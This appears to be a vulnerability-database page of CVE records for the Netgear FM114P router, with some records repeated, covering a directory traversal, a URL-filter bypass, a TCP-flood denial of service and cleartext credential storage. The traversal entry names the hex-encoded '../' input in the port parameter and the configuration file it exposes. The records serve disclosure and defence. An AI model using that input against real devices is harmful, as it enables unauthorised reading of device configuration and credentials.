"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2003-02-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "6807",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2003-1427",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "6807",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2003-1427",
"datePublished": "2007-10-20T10:00:00",
"dateReserved": "2007-10-19T00:00:00",
"dateUpdated": "2024-08-08T02:28:02.785Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-1877 (GCVE-0-2002-1877)
Vulnerability from cvelistv5 – Published: 2005-06-28 04:00 – Updated: 2024-08-08 03:43
VLAI?
Summary
NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:43:33.128Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5667"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-09-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2009-10-14T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5667"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-1877",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"refsource": "BUGTRAQ",
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5667"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-1877",
"datePublished": "2005-06-28T04:00:00",
"dateReserved": "2005-06-29T00:00:00",
"dateUpdated": "2024-08-08T03:43:33.128Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2003-1427 (GCVE-0-2003-1427)
Vulnerability from nvd – Published: 2007-10-20 10:00 – Updated: 2024-08-08 02:28
VLAI?
Summary
Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:28:02.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "6807",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2003-02-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "6807",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2003-1427",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "6807",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/6807"
},
{
"name": "20030209 Bug in Netgear FM114P Wireless Router firmware",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"name": "netgear-fm114p-directory-traversal(11279)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2003-1427",
"datePublished": "2007-10-20T10:00:00",
"dateReserved": "2007-10-19T00:00:00",
"dateUpdated": "2024-08-08T02:28:02.785Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2354 (GCVE-0-2002-2354)
Vulnerability from nvd – Published: 2007-10-29 19:00 – Updated: 2024-09-16 19:56
VLAI?
Summary
Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.934Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5940"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5940"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2354",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5940"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2354",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-16T19:56:19.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2355 (GCVE-0-2002-2355)
Vulnerability from nvd – Published: 2007-10-29 19:00 – Updated: 2024-09-17 02:36
VLAI?
Summary
Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.776Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "5943",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/294740"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "5943",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/294740"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2355",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "5943",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/294740"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2355",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-17T02:36:17.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-1877 (GCVE-0-2002-1877)
Vulnerability from nvd – Published: 2005-06-28 04:00 – Updated: 2024-08-08 03:43
VLAI?
Summary
NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:43:33.128Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5667"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-09-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2009-10-14T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5667"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-1877",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netgear-fm114p-ip-bypass(10061)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"name": "20020907 NetGear FM114P URL filter bypassing vulnerability",
"refsource": "BUGTRAQ",
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"name": "5667",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5667"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-1877",
"datePublished": "2005-06-28T04:00:00",
"dateReserved": "2005-06-29T00:00:00",
"dateUpdated": "2024-08-08T03:43:33.128Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}